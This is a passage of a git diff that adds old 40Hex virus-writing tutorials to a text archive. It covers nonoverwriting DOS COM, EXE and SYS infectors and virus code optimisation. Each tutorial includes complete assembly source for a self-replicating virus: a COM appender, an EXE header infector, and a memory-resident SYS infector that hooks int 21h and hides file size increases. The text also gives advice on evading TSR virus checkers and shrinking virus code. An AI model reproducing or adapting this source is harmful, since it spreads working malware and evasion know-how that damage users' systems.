home and churn out hacks of virii. Yay. Anybody with a disassembler and + some free time can churn out dozens of undetectable (unscannable) variants + of any given virus in an hour. Others have not progressed beyond the + overwriting virus, the type of virus with the most limited potential for + spreading. Still others have never written a virus before and would like + to learn. This article is designed as a simple introduction to all + interested to the world of nonoverwriting virii. All that is assumed is a + working knowledge of 80x86 assembly language. + + Only the infection of COM files will be treated in this article, since the + infection routine is, I think, easier to understand and certainly easier to + code than that of EXE files. But do not dispair! EXE infections will be + covered in the next issue of 40Hex. + + COM files are described by IBM and Microsoft as "memory image files." + Basically, when a COM file is run, the file is loaded as is into memory. + No translation or interpretation of any sort takes place. The following + steps occur when a COM file is run: + + 1) A PSP is built. + 2) The file is loaded directly above the PSP. + 3) The program is run starting from the beginning. + + The PSP is a 256 byte header storing such vital data as the command line + parametres used to call the program. The file is located starting at + offset 100h of the segment where the program is loaded. Due to the 64K + limit on segment length, COM files may only be a maximum of 64K-100h bytes + long, or 65280 bytes. If you infect a COM file, make sure the final size + is below this amount or the PSP will get corrupted. + + Since the beginning of the file is at offset 100h in the segment (this is + the reason for the org 100h at the start of assembly source for com files), + the initial IP is set to 100h. The key to understanding nonoverwriting COM + virii is to remember that once the program is loaded into memory, it can be + changed at will without affecting the actual file on disk. + + The strategy of an overwriting virus is to write the virus to the beginning + of the COM file. This, of course, utterly annihilates the original program. + This, of course, is lame. The nonoverwriting virus changes only the first + few bytes and tacks the virus onto the end of the executable. The new + bytes at the beginning of the file cause the program, once loaded, to jump + to the virus code. After the virus is done executing, the original first + few bytes are rewritten to the area starting at 100h and a jmp instruction + is executed to that location (100h). The infected program is none the + worse for the wear and will run without error. + + The trick is to find the correct bytes to add to the beginning of the file. + The most common method is to use a JMP instruction followed by a two byte + displacement. Since these three bytes replace three bytes of the original + program, it is important to save these bytes upon infection. The JMP is + encoded with a byte of 0e9h and the displacement is simply the old file + length minus three. + + To replace the old bytes, simply use code similar to the following: + mov di, 100h + mov si, offset saved_bytes + movsw + movsb + + And to return control to the original program, use the following: + mov di, 100h + jmp di + + or any equivalent statements. + + When writing nonoverwriting virii, it is important to understand that the + variables used in the code will not be in their original locations. Since + virii are added to the end of the file, you must take the filesize into + account when calculating offsets. The standard procedure is to use the + short combination of statements: + + call oldtrick + oldtrick: + pop bp ; bp = current IP + sub bp, offset oldtrick ; subtract from original offset + + After these statements have been executed, bp will hold the difference in + the new offsets of the variables from the original. To account for the + difference, make the following substitutions in the viral code: + + lea dx, [bp+offset variable] + instead of + mov dx, offset variable + + and + + mov dx, word ptr [bp+offset variable] + instead of + mov dx, word ptr variable + + Alternatively, if you want to save a few bytes and are willing to suffer + some headaches, leave out the sub bp, offset oldtrick and calculate all + offsets as per the procedure above EXCEPT you must now also subtract offset + oldtrick from each of the offsets. + + The following is a short nonoverwriting virus which will hopefully help in + your understanding of the techniques explained above. It's sort of cheesy, + since I designed it to be small and easily understandable. In addition to + being inefficient (in terms of size), it fails to preserve file date/time + and will not infect read-only files. However, it serves its purpose well + as a teaching aid. + + --------Tear line---------------------------------------------------------- + + DumbVirus segment + Assume CS:DumbVirus + Org 100h ; account for PSP + + ; Dumb Virus - 40Hex demo virus + ; Assemble with TASM /m2 + + Start: db 0e9h ; jmp duh + dw 0 + + ; This is where the virus starts + duh: call next + next: pop bp ; bp holds current location + sub bp, offset next ; calculate net change + + ; Restore the original first three bytes + lea si, [bp+offset stuff] + mov di, 100h + ; Put 100h on the stack for the retn later + ; This will allow for the return to the beginning of the file + push di + movsw + movsb + + ; Change DTA from default (otherwise Findfirst/next will destroy + ; commandline parametres + lea dx, [bp+offset dta] + call set_dta + + mov ah, 4eh ; Find first + lea dx, [bp+masker] ; search for '*.COM',0 + xor cx, cx ; attribute mask - this is unnecessary + tryanother: + int 21h + jc quit ; Quit on error + + ; Open file for read/write + ; Note: This fails on read-only files + mov ax, 3D02h + lea dx, [bp+offset dta+30] ; File name is located in DTA + int 21h + xchg ax, bx + + ; Read in the first three bytes + mov ah, 3fh + lea dx, [bp+stuff] + mov cx, 3 + int 21h + + ; Check for previous infection + mov ax, word ptr [bp+dta+26] ; ax = filesize + mov cx, word ptr [bp+stuff+1] ; jmp location + add cx, eov - duh + 3 ; convert to filesize + cmp ax, cx ; if same, already infected + jz close ; so quit out of here + + ; Calculate the offset of the jmp + sub ax, 3 ; ax = filesize - 3 + mov word ptr [bp+writebuffer], ax + + ; Go to the beginning of the file + xor al, al + call f_ptr + + ; Write the three bytes + mov ah, 40h + mov cx, 3 + lea dx, [bp+e9] + int 21h + + ; Go to the end of the file + mov al, 2 + call f_ptr + + ; And write the rest of the virus + mov ah, 40h + mov cx, eov - duh + lea dx, [bp+duh] + int 21h + + close: + mov ah, 3eh + int 21h + + ; Try infecting another file + mov ah, 4fh ; Find next + jmp short tryanother + + ; Restore the DTA and return control to the original program + quit: mov dx, 80h ; Restore current DTA to + ; the default @ PSP:80h + set_dta: + mov ah, 1ah ; Set disk transfer address + int 21h + retn + f_ptr: mov ah, 42h + xor cx, cx + cwd ; equivalent to: xor dx, dx + int 21h + retn + + masker db '*.com',0 + ; Original three bytes of the infected file + ; Currently holds a INT 20h instruction and a null byte + stuff db 0cdh, 20h, 0 + e9 db 0e9h + eov equ $ ; End of the virus + ; The following variables are stored in the heap space (the area between + ; the stack and the code) and are not part of the virus that is written + ; to files. + writebuffer dw ? ; Scratch area holding the + ; JMP offset + dta db 42 dup (?) + DumbVirus ENDS + END Start + + --------------------------------------------------------------------------- + + Do not worry if not everything makes sense to you just yet. I tried to + keep the example virus as simple as possible, although, admittedly, the + explanations were a bit cryptic. It should all come to you in time. + + For a more complete discussion of nonoverwriting virii, pick up a copy of + each of the first three parts of my virus writing guide (the phunky, the + chunky, and the crunchy), where you may find a thorough tutorial on + nonresident virii suitable for any beginning virus programmer. diff --git a/textfiles.com/virus/datut003.txt b/textfiles.com/virus/datut003.txt new file mode 100644 index 00000000..e019b1bb --- /dev/null +++ b/textfiles.com/virus/datut003.txt @@ -0,0 +1,322 @@ + + + An Introduction to Nonoverwriting Virii + Part II: EXE Infectors + + By Dark Angel + + + In the last issue of 40Hex, I presented theory and code for the + nonoverwriting COM infector, the simplest of all parasitic virii. + Hopefully, having learned COM infections cold, you are now ready for EXE + infections. There is a grey veil covering the technique of EXE infections, + as the majority of virii are COM-only. + + EXE infections are, in some respects, simpler than COM viruses. + However, to understand the infection, you must understand the structure of + EXE files (naturally). EXE files are structured into segments which are + loaded consecutively atop one another. Thus, all an EXE infector must do + is create its own segment in the EXE file and alter the entry point + appropriately. Therefore, EXE infections do not require restoration of + bytes of code, but rather involve the manipulation of the header which + appears in the beginning every EXE file and the appending of viral code to + the infected file. The format of the header follows: + + Offset Description + 00 ID word, either 'MZ' or 'ZM' + 02 Number of bytes in the last (512 byte) page in the image + 04 Total number of 512 byte pages in the file + 06 Number of entries in the segment table + 08 Size of the header in (16 byte) paragraphs + 0A Minimum memory required in paragraphs + 0C Maximum memory requested in paragraphs + 0E Initial offset in paragraphs to stack segment from header + 10 Initial offset in bytes of stack pointer from stack segment + 12 Negative checksum (ignored) + 14 Initial offset in bytes of instruction pointer from code segment + 16 Initial offset in paragraphs of code segment from header + 18 Offset of relocation table from start of file + 1A Overlay number (ignored) + + The ID word is generally 'ZM' (in the Intel little-endian format). Few + files start with the alternate form, 'MZ' (once again in Intel little- + endian format). To save space, a check for the alternate form of the EXE + ID in the virus may be omitted, although a few files may be corrupted due + to this omission. + + The words at offsets 2 and 4 are related. The word at offset 4 contains + the filesize in pages. A page is a 512 byte chunk of memory, just as a + word is a two byte chunk of memory. This number is rounded up, so a file + of length 514 bytes would contain a 2 at offset 4 in the EXE header. The + word at offset 2 is the image length modulo 512. The image length does not + include the header length. This is one of the bizarre quirks of the EXE + header. Since the header length is usually a multiple of 512 anyway, this + quirk usually does not matter. If the word at offset 2 is equal to four, + then it is generally ignored (heck, it's never really used anyway) since + pre-1.10 versions of the Microsoft linker had a bug which caused the word + to always be equal to four. If you are bold, the virus can set this word + to 4. However, keep in mind that this was a bug of the linker and not all + command interpreters may recognise this quirk. + + The minimum memory required by the program (offset A) can be ignored by the + virus, as the maximum memory is generally allocated to the program by the + operating system. However, once again, ignoring this area of the header + MAY cause an unsucessful infection. Simply adding the virus size in + paragraphs to this value can nullify the problem. + + The words representing the initial stack segment and pointer are reversed + (not in little-endian format). In other words, an LES to this location + will yield the stack pointer in ES and the stack segment in another + register. The initial SS:SP is calculated with the base address of + 0000:0000 being at the end of the header. + + Similarly, the initial CS:IP (in little-endian format) is calculated with + the base address of 0000:0000 at the end of the header. For example, if + the program entry point appears directly after the header, then the CS:IP + would be 0000:0000. When the program is loaded, the PSP+10 is added to the + segment value (the extra 10 accounts for the 100h bytes of the PSP). + + All the relevant portions of the EXE header have been covered. So what + should be done to write a nonoverwriting EXE infector? First, the virus + must be appended to the end of the file. Second, the initial CS:IP must be + saved and subsequently changed in the header. Third, the initial SS:SP + should also be saved and changed. This is to avoid any possible memory + conflicts from the stack overwriting viral code. Fourth, the file size + area of the header should be modified to correctly reflect the new size of + the file. Fifth, any additional safety modifications such as increasing + the minimum memory allocation should be made. Last, the header should be + written to the infected file. + + There are several good areas for ID bytes in the EXE header. The first is + in the stack pointer field. Since it should be changed anyway, changing it + to a predictable number would add nothing to the code length. Make sure, + however, to make the stack pointer high enough to prevent code overwrites. + Another common area for ID bytes is in the negative checksum field. Since + it is an unused field, altering it won't affect the execution of any + programs. + + One further item should be mentioned before the code for the EXE infector. + It is important to remember that EXE files are loaded differently than COM + files. Although a PSP is still built, the initial CS does NOT point to it. + Instead, it points to wherever the entry point happens to be. DS and ES + point to the PSP, and therefore do NOT point to the entry point (your virus + code). It is important to restore DS and ES to their proper values before + returning control to the EXE. + + ----cut here--------------------------------------------------------------- + + .model tiny ; Handy TASM directive + .code ; Virus code segment + org 100h ; COM file starting IP + ; Cheesy EXE infector + ; Written by Dark Angel of PHALCON/SKISM + ; For 40Hex Number 8 Volume 2 Issue 4 + id = 'DA' ; ID word for EXE infections + + startvirus: ; virus code starts here + call next ; calculate delta offset + next: pop bp ; bp = IP next + sub bp,offset next ; bp = delta offset + + push ds + push es + push cs ; DS = CS + pop ds + push cs ; ES = CS + pop es + lea si,[bp+jmpsave2] + lea di,[bp+jmpsave] + movsw + movsw + movsw + movsw + + mov ah,1Ah ; Set new DTA + lea dx,[bp+newDTA] ; new DTA @ DS:DX + int 21h + + lea dx,[bp+exe_mask] + mov ah,4eh ; find first file + mov cx,7 ; any attribute + findfirstnext: + int 21h ; DS:DX points to mask + jc done_infections ; No mo files found + + mov al,0h ; Open read only + call open + + mov ah,3fh ; Read file to buffer + lea dx,[bp+buffer] ; @ DS:DX + mov cx,1Ah ; 1Ah bytes + int 21h + + mov ah,3eh ; Close file + int 21h + + checkEXE: cmp word ptr [bp+buffer+10h],id ; is it already infected? + jnz infect_exe + find_next: + mov ah,4fh ; find next file + jmp short findfirstnext + done_infections: + mov ah,1ah ; restore DTA to default + mov dx,80h ; DTA in PSP + pop es + pop ds ; DS->PSP + int 21h + mov ax,es ; AX = PSP segment + add ax,10h ; Adjust for PSP + add word ptr cs:[si+jmpsave+2],ax + add ax,word ptr cs:[si+stacksave+2] + cli ; Clear intrpts for stack manip. + mov sp,word ptr cs:[si+stacksave] + mov ss,ax + sti + db 0eah ; jmp ssss:oooo + jmpsave dd ? ; Original CS:IP + stacksave dd ? ; Original SS:SP + jmpsave2 dd 0fff00000h ; Needed for carrier file + stacksave2 dd ? + + creator db '[MPC]',0,'Dark Angel of PHALCON/SKISM',0 + virusname db '[DemoEXE] for 40Hex',0 + + infect_exe: + les ax, dword ptr [bp+buffer+14h] ; Save old entry point + mov word ptr [bp+jmpsave2], ax + mov word ptr [bp+jmpsave2+2], es + + les ax, dword ptr [bp+buffer+0Eh] ; Save old stack + mov word ptr [bp+stacksave2], es + mov word ptr [bp+stacksave2+2], ax + + mov ax, word ptr [bp+buffer + 8] ; Get header size + mov cl, 4 ; convert to bytes + shl ax, cl + xchg ax, bx + + les ax, [bp+offset newDTA+26]; Get file size + mov dx, es ; to DX:AX + push ax + push dx + + sub ax, bx ; Subtract header size from + sbb dx, 0 ; file size + + mov cx, 10h ; Convert to segment:offset + div cx ; form + + mov word ptr [bp+buffer+14h], dx ; New entry point + mov word ptr [bp+buffer+16h], ax + + mov word ptr [bp+buffer+0Eh], ax ; and stack + mov word ptr [bp+buffer+10h], id + + pop dx ; get file length + pop ax + + add ax, heap-startvirus ; add virus size + adc dx, 0 + + mov cl, 9 ; 2**9 = 512 + push ax + shr ax, cl + ror dx, cl + stc + adc dx, ax ; filesize in pages + pop ax + and ah, 1 ; mod 512 + + mov word ptr [bp+buffer+4], dx ; new file size + mov word ptr [bp+buffer+2], ax + + push cs ; restore ES + pop es + + mov cx, 1ah + finishinfection: + push cx ; Save # bytes to write + xor cx,cx ; Clear attributes + call attributes ; Set file attributes + + mov al,2 + call open + + mov ah,40h ; Write to file + lea dx,[bp+buffer] ; Write from buffer + pop cx ; cx bytes + int 21h + + mov ax,4202h ; Move file pointer + xor cx,cx ; to end of file + cwd ; xor dx,dx + int 21h + + mov ah,40h ; Concatenate virus + lea dx,[bp+startvirus] + mov cx,heap-startvirus ; # bytes to write + int 21h + + mov ax,5701h ; Restore creation date/time + mov cx,word ptr [bp+newDTA+16h] ; time + mov dx,word ptr [bp+newDTA+18h] ; date + int 21h + + mov ah,3eh ; Close file + int 21h + + mov ch,0 + mov cl,byte ptr [bp+newDTA+15h] ; Restore original + call attributes ; attributes + + mo_infections: jmp find_next + + open: + mov ah,3dh + lea dx,[bp+newDTA+30] ; filename in DTA + int 21h + xchg ax,bx + ret + + attributes: + mov ax,4301h ; Set attributes to cx + lea dx,[bp+newDTA+30] ; filename in DTA + int 21h + ret + + exe_mask db '*.exe',0 + heap: ; Variables not in code + newDTA db 42 dup (?) ; Temporary DTA + buffer db 1ah dup (?) ; read buffer + endheap: ; End of virus + + end startvirus + + ----cut here--------------------------------------------------------------- + + This is a simple EXE infector. It has limitations; for example, it does + not handle misnamed COM files. This can be remedied by a simple check: + + cmp [bp+buffer],'ZM' + jnz misnamed_COM + continueEXE: + + Take special notice of the done_infections and infect_exe procedures. They + handle all the relevant portions of the EXE infection. The restoration of + the EXE file simply consists of resetting the stack and a far jmp to the + original entry point. + + A final note on EXE infections: it is often helpful to "pad" EXE files to + the nearest segment. This accomplishes two things. First, the initial IP + is always 0, a fact which can be used to eliminate delta offset + calculations. Code space can be saved by replacing all those annoying + relative memory addressing statements ([bp+offset blip]) statements with + their absolute counterparts (blip). Second, recalculation of header info + can be handled in paragraphs, simplifying it tremendously. The code for + this is left as an exercise for the reader. + + This file is dedicated to the [XxXX] (Censored. -Ed.) programmers (who have + yet to figure out how to write EXE infectors). Hopefully, this text can + teach them (and everyone else) how to progress beyond simple COM and spawn- + ing EXE infectors. In the next issue of 40Hex, I will present the theory + and code for the next step of file infector - the coveted SYS file. diff --git a/textfiles.com/virus/datut004.txt b/textfiles.com/virus/datut004.txt new file mode 100644 index 00000000..17276242 --- /dev/null +++ b/textfiles.com/virus/datut004.txt @@ -0,0 +1,452 @@ + + + An Introduction to Nonoverwriting Viruses + Part III: SYS Infectors + + By Dark Angel + + + The SYS file is the most overlooked executable file structure in DOS. + Viruses are quite capable of infecting SYS files, as DOS kindly allows for + such extensions to this file format. + + The SYS file is loaded beginning at offset 0 of a particular segment. + It consists of a header followed by code. SYS files may be chained + together after a simple modification in the header. This is the key to + infecting SYS files. + + There are two types of device drivers; block and character. Block + devices include floppy, hard, and virtual disks, i.e. any media which can + store data. Character devices include printers, modems, keyboard, and the + screen. The virus will generally be a character device, as it reduces + complexity. + + The header structure is straightforward: + + Offset Size Description + ------ ---- ----------- + 0h DWORD Pointer to next header + 4h WORD Attribute + 6h WORD Pointer to strategy routine + 8h WORD Pointer to interrupt routine + 0Ah QWORD Name of the device driver + + The pointer to the next device driver header appears at offset zero in the + header. This is a far pointer consisting of a segment:offset pair. If the + current device is the only device appearing in the SYS file, then this + pointer should be set to FFFF:FFFF. However, if there are two or more + device drivers contained in the file, then the offset field should be equal + to the absolute location of the next device in the file. The segment field + should remain FFFF. For example, if a second device driver occurs at + offset 300h of the file, then the DWORD at offset 0 would be FFFF:0300 The + second (and all other) device driver must contain a new header as well. + + The next field contains the attribute of the device driver. Bit 15 + determines the nature of the device driver. If bit 15 is set, then the + device driver header corresponds to a character device; otherwise, the + device is a block device. You need not concern yourself with any of the + other bits; they may remain cleared. + + Before the next two fields may be understood, it is necessary to introduce + the concept of the request header. The request header contains DOS's + requests of the device driver. For example, DOS may ask for initialisation + or a read or even a status check. The information needed by the device + driver to interpret the request is all contained in the request header. It + is passed to the strategy routine by DOS as a far pointer in ES:BX. The + job of the strategy routine is to save the pointer for use by the interrupt + routine. The interrupt routine is called by DOS immediately after the + strategy routine. This routine processes the request in the header and + performs the appropriate actions. + + The word-length pointers in the SYS header to the strategy and interrupt + routines are relative to the start of the SYS file. So, if the strategy + routine resides in absolute offset 32h in the file, then the field + containing the location of the strategy routine would hold the number 32h. + + The name field in the SYS header simply holds an 8 byte device name. For + example, 'NUL ' and 'CLOCK$ ' are two common DOS devices. The name + should be justified with space characters (0x20). + + By using DOS's feature of chaining SYS files, we may easily infect + this type of file. No bytes need to be saved. There are but two steps. + The first is to concatenate the virus to the target file. The second is to + alter the first word of the SYS file to point to the virus header. The + only trick involved is writing the SYS interrupt routine. The format of + the request header is: + + Offset Size Description + ------ ---- ----------- + 0h BYTE Length of request header (in bytes) + 1h BYTE Unit code (for block devices) + 2h BYTE Command code + 3h WORD Status + 5h QWORD Reserved by DOS + 0Dh Var. Data for the operation + + Only one command code is relevant for use in the virus. Upon + initialisation of the device driver, DOS will send a request header with 0 + in the command code field. This is the initialisation check. The format + of the variable sized field in the request header in this case is: + + Offset Size Description + ------ ---- ----------- + 0Dh BYTE Number of units (ignored by character devices) + 0Eh DWORD Ending address of resident program code + 12h DWORD Pointer to BPB aray (ignored by character devices) + 16h BYTE Drive number (irrelevant in character devices) + + The only relevant fields are at offset 3 and 0Eh. Offset 3 holds the + status word of the operation. The virus fills this in with the appropriate + value. Generally, the virus should put a value of 100h in the status word + in the event of a successful request and a 8103h in the status word in the + event of a failure. The 8103h causes DOS to think that the device driver + does not understand the request. A value of 8102h should be returned in + the event of a failed installation. Offset 0Eh will hold the address of + the end of the virus (include the heap!) in the event of a successful + installation and CS:0 in the event of a failure. + + Basically, the strategy routine of the virus should contain a simple + stub to save the es:bx pointer. The interrupt routine should fail all + requests other than initialisation. It should perform an installation if + the virus is not yet installed and fail if it is already in memory + (remember to set offset 0eh to cs:0). + + A sample infector with very limited stealth features follows. While it is + somewhat large, it may be easily coupled with a simple COM/EXE infection + routine to create a powerful virus. It is a SYS-only, memory resident + infector. + + --------------------------------------------------------------------------- + .model tiny + .code + org 0 ; SYS files originate at zero + ; SYS infector + ; Written by Dark Angel of Phalcon/Skism + ; for 40Hex + header: + + next_header dd -1 ; FFFF:FFFF + attribute dw 8000h ; character device + strategy dw offset _strategy + interrupt dw offset _interrupt + namevirus db 'SYS INF ' ; simple SYS infector + + endheader: + + author db 0,'Simple SYS infector',0Dh,0Ah + db 'Written by Dark Angel of Phalcon/Skism',0 + + _strategy: ; save es:bx pointer + push si + call next_strategy + next_strategy: + pop si + mov cs:[si+offset savebx-offset next_strategy],bx + mov cs:[si+offset savees-offset next_strategy],es + pop si + retf + + _interrupt: ; install virus in memory + push ds ; generally, only the segment + push es ; registers need to be preserved + + push cs + pop ds + + call next_interrupt + next_interrupt: + pop bp + les bx,cs:[bp+savebx-next_interrupt] ; get request header + pointer + + mov es:[bx+3],8103h ; default to fail request + cmp byte ptr es:[bx+2], 0 ; check if it is installation + request + jnz exit_interrupt ; exit if it is not + + mov es:[bx+10h],cs ; fill in ending address value + lea si,[bp+header-next_interrupt] + mov es:[bx+0eh],si + dec byte ptr es:[bx+3] ; and assume installation failure + + mov ax, 0b0fh ; installation check + int 21h + cmp cx, 0b0fh + jz exit_interrupt ; exit if already installed + + add es:[bx+0eh],offset endheap ; fixup ending address + mov es:[bx+3],100h ; and status word + + xor ax,ax + mov ds,ax ; ds->interrupt table + les bx,ds:[21h*4] ; get old interrupt handler + mov word ptr cs:[bp+oldint21-next_interrupt],bx + mov word ptr cs:[bp+oldint21+2-next_interrupt],es + + lea si,[bp+int21-next_interrupt] + cli + mov ds:[21h*4],si ; replace int 21h handler + mov ds:[21h*4+2],cs + sti + exit_interrupt: + pop es + pop ds + retf + + int21: + cmp ax,0b0fh ; installation check? + jnz notinstall + xchg cx,ax ; mark already installed + exitint21: + iret + notinstall: + pushf + db 9ah ; call far ptr This combined with + the + oldint21 dd ? ; pushf simulates an int 21h call + + pushf + + push bp + push ax + + mov bp, sp ; set up new stack frame + ; flags [bp+10] + ; CS:IP [bp+6] + ; flags new [bp+4] + ; bp [bp+2] + ; ax [bp] + mov ax, [bp+4] ; get flags + mov [bp+10], ax ; replace old flags with new + + pop ax ; restore the stack + pop bp + popf + + cmp ah, 11h ; trap FCB find first and + jz findfirstnext + cmp ah, 12h ; FCB find next calls only + jnz exitint21 + findfirstnext: + cmp al,0ffh ; successful findfirst/next? + jz exitint21 ; exit if not + + push bp + call next_int21 + next_int21: + pop bp + sub bp, offset next_int21 + + push ax ; save all registers + push bx + push cx + push dx + push ds + push es + push si + push di + + mov ah, 2fh ; ES:BX <- DTA + int 21h + + push es ; DS:BX->DTA + pop ds + + cmp byte ptr [bx], 0FFh ; extended FCB? + jnz regularFCB ; continue if not + add bx, 7 ; otherwise, convert to regular FCB + regularFCB: + mov cx, [bx+29] ; get file size + mov word ptr cs:[bp+filesize], cx + + push cs ; ES = CS + pop es + + cld + + ; The following code converts the FCB to an ASCIIZ string + lea di, [bp+filename] ; destination buffer + lea si, [bx+1] ; source buffer - filename + + cmp word ptr [si],'OC' ; do not infect CONFIG.SYS + jz bombout + + mov cx, 8 ; copy up to 8 bytes + back: cmp byte ptr ds:[si], ' ' ; is it a space? + jz copy_done ; if so, done copying + movsb ; otherwise, move character to + buffer + loop back + + copy_done: + mov al, '.' ; copy period + stosb + + mov ax, 'YS' + lea si, [bx+9] ; source buffer - extension + cmp word ptr [si], ax ; check if it has the SYS + jnz bombout ; extension and exit if it + cmp byte ptr [si+2], al ; does not + jnz bombout + stosw ; copy 'SYS' to the buffer + stosb + + mov al, 0 ; copy null byte + stosb + + push ds + pop es ; es:bx -> DTA + + push cs + pop ds + + xchg di,bx ; es:di -> DTA + ; open file, read/only + call open ; al already 0 + jc bombout ; exit on error + + mov ah, 3fh ; read first + mov cx, 2 ; two bytes of + lea dx, [bp+buffer] ; the header + int 21h + + mov ah, 3eh ; close file + int 21h + + InfectSYS: + inc word ptr cs:[bp+buffer] ; if first word not FFFF + jz continueSYS ; assume already infected + ; this is a safe bet since + ; most SYS files do not have + ; another SYS file chained on + + alreadyinfected: + sub es:[di+29], heap - header ; hide file size increase + ; during a DIR command + ; This causes CHKDSK errors + ;sbb word ptr es:[di+31], 0 ; not needed because SYS files + ; are limited to 64K maximum + + bombout: + pop di + pop si + pop es + pop ds + pop dx + pop cx + pop bx + pop ax + pop bp + iret + + continueSYS: + push ds + pop es + + lea si, [bp+offset header] + lea di, [bp+offset bigbuffer] + mov cx, offset endheader - offset header + rep movsb + + mov cx, cs:[bp+filesize] + add cx, offset _strategy - offset header ; calculate offset to + mov word ptr [bp+bigbuffer+6],cx ; strategy routine + + add cx, offset _interrupt - offset _strategy;calculate offset to + mov word ptr cs:[bp+bigbuffer+8], cx ; interrupt routine + + continueinfection: + mov ax, 4300h ; get file attributes + lea dx, [bp+filename] + int 21h + + push cx ; save attributes on stack + push dx ; save filename on stack + + mov ax, 4301h ; clear file attributes + xor cx, cx + lea dx,[bp+filename] + int 21h + + call openreadwrite + + mov ax, 5700h ; get file time/date + int 21h + push cx ; save them on stack + push dx + + mov ah, 40h ; write filesize to the old + mov cx, 2 ; SYS header + lea dx, [bp+filesize] + int 21h + + mov ax, 4202h ; go to end of file + xor cx, cx + cwd ; xor dx, dx + int 21h + + mov ah, 40h ; concatenate header + mov cx, offset endheader - offset header + lea dx, [bp+bigbuffer] + int 21h + + mov ah, 40h ; concatenate virus + mov cx, offset heap - offset endheader + lea dx, [bp+endheader] + int 21h + + mov ax, 5701h ; restore file time/date + pop dx + pop cx + int 21h + + mov ah, 3eh ; close file + int 21h + + mov ax, 4301h ; restore file attributes + pop cx + pop dx + int 21h + + jmp bombout + + openreadwrite: + mov al, 2 ; open read/write mode + open: mov ah, 3dh + lea dx,[bp+filename] + int 21h + xchg ax, bx ; put handle in bx + ret + + heap: + savebx dw ? + savees dw ? + buffer db 2 dup (?) + filename db 13 dup (?) + filesize dw ? + bigbuffer db offset endheader - offset header dup (?) + endheap: + + end header + --------------------------------------------------------------------------- + + The reason the "delta offset" is needed throughout the file is because + it is impossible to know the exact location where the SYS file will be + loaded into memory. This can be ameliorated by some file padding and fancy + mathematical calculations. + + The advantages of using SYS files are manyfold. There is no load high + routine involved apart from the strategy/interrupt routines. This saves + space. SYS files also generally load before TSR virus checkers. TSR + checkers also can't detect the residency routine of the virus, since it is + a normal part of the DOS loading process. The routine for the infection of + the SYS file is ridiculously easy to implement and takes remarkably little + space, so there is no reason not to include SYS support in viruses. + Finally, the memory "loss" reported by CHKDSK usually associated with + memory resident viruses is not a problem with SYS files. + + A SYS file infector, when combined with a COM and EXE general + infector, can lead to a powerful virus. Once the first SYS file is + infected, the infected system becomes extremely vulnerable to the virus, as + there is little the user can do to prevent the virus from running, short + of a clean boot. diff --git a/textfiles.com/virus/datut005.txt b/textfiles.com/virus/datut005.txt new file mode 100644 index 00000000..65795801 --- /dev/null +++ b/textfiles.com/virus/datut005.txt @@ -0,0 +1,184 @@ + + + CODE OPTIMISATION, A BEGINNER'S GUIDE + + Written by Dark Angel + + + When writing a virus, size is a primary concern. A bloated virus carrying + unnecessary baggage will run slower than its optimised counterpart and eat + up more disk space. + + Never optimise any code before it works fully, since altering code after + optimisation often messes up the optimisation and, in turn, messes up the + code. After it works, the focus can shift to optimisation. Always keep a + backup of the last working copy of the virus, as optimisation often leads + to improperly working code. With this in mind, a few techniques of + optimisation will be introduced. + + There are two types of optimisation: structural and local. Structural + optimisation occurs when shifting the position of code or rethinking and + reordering the functions of the virus shorten its length. A simple example + follows: + + check_install: + mov ax,1234h + int 21h + cmp bx,1234h + ret + + install_virus: + call check_install + jz exit_install + + If this is the only instance that the procedure check_install is called, + the following optimisation may be made: + + install_virus: + mov ax,1234h + int 21h + cmp bx,1234h + jz exit_install + + The first fragment wastes a total of 4 bytes - 3 for the call and 1 for the + ret. Four bytes may not seem to be worth the effort, but after many such + optimisations, the code size may be brought down significantly. The + reverse of this optimisation, using procedures in lieu of repetitive code + fragments, may work in other instances. Properly designed and well-thought + out code will allow for such an optimisation. Another structural + optimisation: + + get attributes + open file read/only + read file + close file + exit if already infected + clear attributes + open file read/write + get file time/date + write new header + move file pointer to end of file + concatenate virus + restore file time/date + close file + restore attributes + exit + + Change the above to: + + get attributes + clear attributes + open file read/write + read file + if infected, exit to close file + get file time/date + move file pointer to end of file + concatenate virus + move file pointer to beginning + write new header + restore file time/date + close file + restore attributes + exit + + By using the second, an open file and a close file are eliminated while + adding only one move file pointer request. This can save a healthy number + of bytes. + + Local, or peephole, optimisation is often easier to do than structural + optimisation. It consists of changing individual statements or short + groups of statements to save bytes. + + The easiest type of peephole optimisation is a simple replacement of one + line with a functional equivalent that takes fewer bytes. The 8086 + instruction set abounds with such possibilities. A few examples follow. + + Perhaps the most widespread optimisation, replace: + mov ax,0 ; this instruction is 3 bytes long + mov bp,0 ; mov reg, 0 with any reg = nonsegment register takes 3 bytes + with + xor ax,ax ; this takes but 2 bytes + xor bp,bp ; mov reg, 0 always takes 2 bytes + or even + sub ax,ax ; also takes 2 bytes + sub bp,bp + + One of the easiest optimisations, yet often overlooked by novices, is the + merging of lines. As an example, replace: + mov bh,5h ; two bytes + mov bl,32h ; two bytes + ; total: four bytes + with + mov bx,532h ; three bytes, save one byte + + A very useful optimisation moving the file handle from ax to bx follows. + Replace: + mov bx,ax ; 2 bytes + with + xchg ax,bx ; 1 byte + + Another easy optimisation which can most easily applied to file pointer + moving operations: + Replace + mov ax,4202h ; save one byte from "mov ah,42h / mov al,2" + xor dx,dx ; saves one byte from "mov dx,0" + xor cx,cx ; same here + int 21h + with + mov ax,4202h + cwd ; equivalent to "xor dx,dx" when ax < 8000h + xor cx,cx + int 21h + + Sometimes it may be desirable to use si as the delta offset variable, as an + instruction involving [si] takes one less byte to encode than its + equivalent using [bp]. This does NOT work with combinations such as + [si+1]. Examples: + + mov ax,[bp] ; 3 bytes + mov word ptr cs:[bp],1234h ; 6 bytes + add ax,[bp+1] ; 3 bytes - no byte savings will occur + + mov ax,[si] ; 2 bytes + mov word ptr cs:[si],1234h ; 5 bytes + add ax,[si+1] ; 3 bytes - this is not smaller + + A somewhat strange and rather specialised optimisation: + inc al ; 2 bytes + inc bl ; 2 bytes + versus + inc ax ; 1 byte + inc bx ; 1 byte + + A structural optimisation can also involve getting rid of redundant code. + As a virus related example, consider the infection routine. In few + instances is an error-trapping routine after each interrupt call necessary. + A single "jc error" is needed, say after the first disk-writing interrupt, + and if that succeeds, the rest should also work fine. Another possibility + is to use a critical error handler instead of error checking. + + How about this example of optimised code: + mov ax, 4300h ; get file attributes + mov dx, offset filename + int 21h + + push dx ; save filename + push cx ; and attributes on stack + + inc ax ; ax = 4301h = set file attributes + push ax ; save 4301h on stack + xor cx,cx ; clear attributes + int 21h + + ...rest of infection... + + pop ax ; ax = 4301h + pop cx ; cx = original attributes of file + pop dx ; 